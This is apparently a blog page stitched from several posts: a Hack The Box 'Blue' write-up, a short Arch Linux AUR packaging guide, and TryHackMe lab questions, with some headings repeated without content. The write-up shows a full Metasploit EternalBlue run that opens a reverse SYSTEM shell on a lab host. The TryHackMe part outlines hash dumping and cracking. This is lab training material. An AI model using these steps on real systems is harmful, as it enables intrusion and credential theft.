I have highlighted the most intergesting exploits is MS17-010 Eternal Blue.

MS17-010 Eternal Blue Investergation

Metasploit

COMMAND

msfdb

RESULT

msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       10.10.10.40                                                     yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >

msf5 auxiliary(scanner/smb/smb_ms17_010) > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf5 auxiliary(scanner/smb/smb_ms17_010) > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.6:4444
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.6:4444 -> 10.10.10.40:49158) at 2019-09-08 09:37:05 +0100
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>hostname
hostname
haris-PC

C:\Windows\system32>

Conclusion

This box was exploited using Eternal Blue making use of 2No. Metasploit module.

Updating an Existing AUR Package File for Arch Linux

September 3, 2019•191 words

Flag the Current AUR Package as out-of-date

Download the Latest Version of the `PKGBUILD` File

As an example when using the yay AUR helper, execute the following command to download the latest version of the PKGBUILD file.

$ yay -G NAMEOFPKG

Update the Relevant Elements of the `PKGBUILD` File

For example update the version number via the pkgver variable.

Generate All `CHECKSUMS` and Insert into the `PKGBUILD` File

Use the below command to generate the required CHECKSUMS.

$ makepkg -g -f -p PKGBUILD

Update the CHECKSUMS within the PKGBUILD file where appropiate.

If Required Download all AUR Dependencies

Ensure all dependencies from the AUR are accounted for by downloading them, for example:

$ yay -S PKGNAME

Use `makepkg` to Install the Package with all dependencies from `pacman`

$ makepkg -sri -p PKGBUILD

The package should now be installed to your PC, please consider sending the current maintaner an email with the updated code with a request to review and update of offical PKGBUILD file.

BreakBeforeMake

TryHackMe - Kenobi

[Task 1] Deploy the vulnerable machine

[Task 2] Enumerating Samba for shares

[Task 3] Gain initial access with ProFTPD

[Task 4] Privilege Escalation with Path Variable Manipulation

TryHackMe - Blue

Prerequisite

TASK 1 - RECON

1. Scan the machine

2. How many ports are open with a port number under 1000?

3. What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

TASK 2 -GAIN ACCESS

1. Start Metasploit

2. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........).

3. Show options and set the one required value. What is the name of this value? (All caps for submission). Following on from the above command we can determine the answer.

4. Run the exploit.

5. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

TASK 3 - ESCALATION

1. If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected).

2. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer).

3. Set the required option, you may need to list all of the sessions to find your target here.

4. Run! If this doesn't work, try completing the exploit from the previous task once more.

5. Once the meterpreter shell conversion completes, select that session for use.

6. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

7. List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

TASK 4 - CRACKING

1. Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

2. Copy this password hash to a file and research how to crack it. What is the cracked password?

TASK 5 - FIND FLAGS!

1. Flag1? (Only submit the flag contents {CONTENTS})

2. Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare,however, it can happen.

3. Flag3?

TryHackMe - Vulnervisity - Privilege Escalation (Task 5)

Reference Links

Hack The Box - Devel

Box Details

ENUMERATION

Inital Port Scanning

masscan

nmap

Discovery

FTP

EXPLOITS

Exploit Search

POST EXPLOIT DISCOVERY

System Information

Hostname

Users

Network Information

Investigate Running Services

Exploit Suggester

Devel Machine

Kalibox

Working Exploit

On Kalibox

Devel Machine

On Kalibox

Hack The Box - Blue

Box Details

ENUMERATION

Inital Port Scanning

masscan

nmap

Port Scan Summary

EXPLOITS

Exploit Search

MS17-010 Eternal Blue Investergation

Metasploit

Conclusion

Updating an Existing AUR Package File for Arch Linux

Flag the Current AUR Package as out-of-date

Download the Latest Version of the PKGBUILD File

Update the Relevant Elements of the PKGBUILD File

Generate All CHECKSUMS and Insert into the PKGBUILD File

If Required Download all AUR Dependencies

Use makepkg to Install the Package with all dependencies from pacman

Download the Latest Version of the `PKGBUILD` File

Update the Relevant Elements of the `PKGBUILD` File

Generate All `CHECKSUMS` and Insert into the `PKGBUILD` File

Use `makepkg` to Install the Package with all dependencies from `pacman`